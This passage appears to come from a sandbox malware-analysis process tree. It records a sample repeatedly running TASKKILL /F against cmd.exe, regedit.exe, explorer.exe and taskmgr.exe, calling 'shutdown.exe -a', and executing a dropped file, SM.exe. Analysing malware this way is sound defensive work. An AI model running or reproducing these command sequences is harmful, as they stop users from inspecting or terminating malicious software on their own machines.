      PID:1388
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        5⤵
        
        PID:2192
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM regedit.exe"
      4⤵
      PID:3052
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        5⤵
        
        PID:2732
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM explorer.exe"
      4⤵
      PID:1536
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        5⤵
        Kills process with taskkill
        
        PID:2572
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
      4⤵
      PID:1776
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        5⤵
        Kills process with taskkill
        
        PID:2052
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "shutdown.exe -a"
      4⤵
      PID:396
    - - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        5⤵
        
        PID:1552
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM cmd.exe"
      4⤵
      PID:592
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        5⤵
        Kills process with taskkill
        
        PID:3024
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM regedit.exe"
      4⤵
      PID:1896
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        5⤵
        
        PID:1384
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM explorer.exe"
      4⤵
      PID:1856
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        5⤵
        
        PID:2044
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
      4⤵
      PID:2280
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        5⤵
        Kills process with taskkill
        
        PID:1872
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "shutdown.exe -a"
      4⤵
      PID:1720
    - - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        5⤵
        
        PID:1308
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM cmd.exe"
      4⤵
      PID:2452
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        5⤵
        
        PID:2188
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM regedit.exe"
      4⤵
      PID:984
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        5⤵
        
        PID:2268
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM explorer.exe"
      4⤵
      PID:2084
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        5⤵
        
        PID:2064
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
      4⤵
      PID:2072
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        5⤵
        
        PID:1748
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "shutdown.exe -a"
      4⤵
      PID:2208
    - - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        5⤵
        
        PID:1724
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM cmd.exe"
      4⤵
      PID:2836
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        5⤵
        Kills process with taskkill
        
        PID:1580
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM regedit.exe"
      4⤵
      PID:2376
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        5⤵
        
        PID:2840
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM explorer.exe"
      4⤵
      PID:2568
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        5⤵
        
        PID:2796
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
      4⤵
      PID:2924
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        5⤵
        
        PID:2696
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "shutdown.exe -a"
      4⤵
      PID:2372
    - - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        5⤵
        
        PID:2748
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM cmd.exe"
      4⤵
      PID:1020
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        5⤵
        
        PID:3032
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM regedit.exe"
      4⤵
      PID:2716
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        5⤵
        
        PID:2216
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM explorer.exe"
      4⤵
      PID:268
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        5⤵
        
        PID:2784
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
      4⤵
      PID:668
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        5⤵
        
        PID:2180
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "shutdown.exe -a"
      4⤵
      PID:788
    - - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        5⤵
        
        PID:2720
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM cmd.exe"
      4⤵
      PID:1704
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        5⤵
        
        PID:2012
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM regedit.exe"
      4⤵
      PID:1220
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        5⤵
        Kills process with taskkill
        
        PID:3012
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM explorer.exe"
      4⤵
      PID:1520
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        5⤵
        Kills process with taskkill
        
        PID:1488
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
      4⤵
      PID:1288
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        5⤵
        
        PID:1148
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "shutdown.exe -a"
      4⤵
      PID:1508
    - - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        5⤵
        
        PID:2588
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM cmd.exe"
      4⤵
      PID:1932
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        5⤵
        
        PID:2396
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM regedit.exe"
      4⤵
      PID:2556
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        5⤵
        Kills process with taskkill
        
        PID:740
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM explorer.exe"
      4⤵
      PID:2348
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        5⤵
        
        PID:2320
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
      4⤵
      PID:1732
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        5⤵
        
        PID:992
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "shutdown.exe -a"
      4⤵
      PID:1796
    - - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        5⤵
        
        PID:824
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM cmd.exe"
      4⤵
      PID:1792
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        5⤵
        
        PID:1924
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM regedit.exe"
      4⤵
      PID:2592
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        5⤵
        
        PID:1860
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM explorer.exe"
      4⤵
      PID:676
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        5⤵
        
        PID:2976
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
      4⤵
      PID:860
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        5⤵
        
        PID:2888
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "shutdown.exe -a"
      4⤵
      PID:896
    - - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        5⤵
        
        PID:2260
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM cmd.exe"
      4⤵
      PID:272
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        5⤵
        Kills process with taskkill
        
        PID:2312
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM regedit.exe"
      4⤵
      PID:2336
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        5⤵
        
        PID:664
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM explorer.exe"
      4⤵
      PID:1576
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        5⤵
        
        PID:2120
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
      4⤵
      PID:596
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        5⤵
        
        PID:1712
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "shutdown.exe -a"
      4⤵
      PID:1584
    - - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        5⤵
        
        PID:2704
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM cmd.exe"
      4⤵
      PID:2612
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        5⤵
        
        PID:2848
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM regedit.exe"
      4⤵
      PID:2376
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        5⤵
        Kills process with taskkill
        
        PID:308
  - - C:\Users\Admin\AppData\Local\Temp\C9B5.tmp\SM.exe
      "C:\Users\Admin\AppData\Local\Temp\C9B5.tmp\SM.exe"
      4⤵
      Executes dropped EXE
      PID:2708
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM explorer.exe"
      4⤵
      PID:2852
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        5⤵
        Kills process with taskkill
        
        PID:2892
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
      4⤵
      PID:2744
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        5⤵
        
        PID:2228
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "shutdown.exe -a"
      4⤵
      PID:3032
    - - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        5⤵
        
        PID:2656
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM cmd.exe"
      4⤵
      PID:2660
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        5⤵
        Kills process with taskkill
        
        PID:2224
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM regedit.exe"
      4⤵
      PID:2668
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        5⤵
        
        PID:2196
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM explorer.exe"
      4⤵
      PID:1340
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        5⤵
        Kills process with taskkill
        
        PID:2528
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
      4⤵
      PID:788
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        5⤵
        
        PID:2016
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "shutdown.exe -a"
      4⤵
      PID:2012
    - - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        5⤵
        
        PID:2056
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM cmd.exe"
      4⤵
      PID:2272
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        5⤵
        
        PID:608
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM regedit.exe"
      4⤵
      PID:1696
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        5⤵
        
        PID:1568
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM explorer.exe"
      4⤵
      PID:1836
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        5⤵
        
        PID:1788
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
      4⤵
      PID:1388
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        5⤵
        
        PID:1372
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "shutdown.exe -a"
      4⤵
      PID:1932
    - - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        5⤵
        
        PID:2108
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM cmd.exe"
      4⤵
      PID:736
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        5⤵
        
        PID:1852
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM regedit.exe"
      4⤵
      PID:2252
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        5⤵
        
        PID:1512
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM explorer.exe"
      4⤵
      PID:2640
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        5⤵
        Kills process with taskkill
        
        PID:2560
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
      4⤵
      PID:1796
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        5⤵
        
        PID:3008
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "shutdown.exe -a"
      4⤵
      PID:1924
    - - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        5⤵
        
        PID:1856
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM cmd.exe"
      4⤵
      PID:1472
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        5⤵
        Kills process with taskkill
        
        PID:1648
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM regedit.exe"
      4⤵
      PID:2280
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        5⤵
        Kills process with taskkill
        
        PID:760
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM explorer.exe"
      4⤵
      PID:1720
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        5⤵
        Kills process with taskkill
        
        PID:1308
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
      4⤵
      PID:812
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        5⤵
        
        PID:1716
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "shutdown.exe -a"
      4⤵
      PID:2128
    - - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        5⤵
        
        PID:1300
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM cmd.exe"
      4⤵
      PID:880
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        5⤵
        
        PID:2160
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM regedit.exe"
      4⤵
      PID:1692
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        5⤵
        
        PID:2580
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM explorer.exe"
      4⤵
      PID:2520
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        5⤵
        
        PID:596
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
      4⤵
      PID:2152
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        5⤵
        
        PID:2916
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "shutdown.exe -a"
      4⤵
      PID:2848
    - - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        5⤵
        
        PID:2876
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM cmd.exe"
      4⤵
      PID:308
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        5⤵
        
        PID:2924
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM regedit.exe"
      4⤵
      PID:2804
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        5⤵
        
        PID:2464
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM explorer.exe"
      4⤵
      PID:2808
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        5⤵
        
        PID:2744
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
      4⤵
      PID:2980
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        5⤵
        
        PID:2648
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "shutdown.exe -a"
      4⤵
      PID:2564
    - - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        5⤵
        
        PID:2288
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM cmd.exe"
      4⤵
      PID:2484
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        5⤵
        
        PID:2668
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM regedit.exe"
      4⤵
      PID:560
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        5⤵
        
        PID:1340
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM explorer.exe"
      4⤵
      PID:1540
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        5⤵
        
        PID:788
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
      4⤵
      PID:1532
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        5⤵
        Kills process with taskkill
        
        PID:1480
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "shutdown.exe -a"
      4⤵
      PID:1380
    - - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        5⤵
        
        PID:1400
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM cmd.exe"
      4⤵
      PID:1252
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        5⤵
        
        PID:1696
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM regedit.exe"
      4⤵
      PID:1516
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        5⤵
        
        PID:1836
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM explorer.exe"
      4⤵
      PID:2936
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        5⤵
        
        PID:1388
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
      4⤵
      PID:2732
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        5⤵
        
        PID:1536
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "shutdown.exe -a"
      4⤵
      PID:2556
    - - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        5⤵
        
        PID:1120
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM cmd.exe"
      4⤵
      PID:2604
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        5⤵
        
        PID:2252
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM regedit.exe"
      4⤵
      PID:1772
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        5⤵
        
        PID:2640
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM explorer.exe"
      4⤵
      PID:2116
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        5⤵
        
        PID:1796
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
      4⤵
      PID:1924
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        5⤵
        
        PID:2424
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "shutdown.exe -a"
      4⤵
      PID:1648
    - - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        5⤵
        
        PID:2324
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM cmd.exe"
      4⤵
      PID:2752
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        5⤵
        
        PID:904
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM regedit.exe"
      4⤵
      PID:2368
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        5⤵
        Kills process with taskkill
        
        PID:2352
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM explorer.exe"
      4⤵
      PID:1764
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        5⤵
        
        PID:984
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
      4⤵
      PID:1660
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        5⤵
        
        PID:2128
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "shutdown.exe -a"
      4⤵
      PID:1748
    - - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        5⤵
        
        PID:2160
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM cmd.exe"
      4⤵
      PID:1576
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        5⤵
        
        PID:1684
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM regedit.exe"
      4⤵
      PID:2460
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        5⤵
        
        PID:1580
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM explorer.exe"
      4⤵
      PID:1724
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        5⤵
        
        PID:2840
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
      4⤵
      PID:2796
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        5⤵
        
        PID:2568
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "shutdown.exe -a"
      4⤵
      PID:2748
    - - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        5⤵
        
        PID:2376
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM cmd.exe"
      4⤵
      PID:1952
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        5⤵
        Kills process with taskkill
        
        PID:2464
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM regedit.exe"
      4⤵
      PID:2656
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        5⤵
        Kills process with taskkill
        
        PID:2744
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM explorer.exe"
      4⤵
      PID:3068
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        5⤵
        
        PID:2648
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
      4⤵
      PID:1500
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        5⤵
        
        PID:2716
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "shutdown.exe -a"
      4⤵
      PID:2608
    - - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        5⤵
        
        PID:2668
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM cmd.exe"
      4⤵
      PID:2184
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        5⤵
        
        PID:1340
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM regedit.exe"
      4⤵
      PID:2056
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        5⤵
        
        PID:1944
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM explorer.exe"
      4⤵
      PID:2928
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        5⤵
        
        PID:892
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
      4⤵
      PID:2632
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        5⤵
        
        PID:1392
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "shutdown.exe -a"
      4⤵
      PID:1488
    - - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        5⤵
        
        PID:2812
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM cmd.exe"
      4⤵
      PID:2264
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        5⤵
        
        PID:1288
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM regedit.exe"
      4⤵
      PID:2572
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        5⤵
        
        PID:2768
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM explorer.exe"
      4⤵
      PID:736
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        5⤵
        
        PID:2112
  - - C:\Windows\SysWOW64\cmd.exe
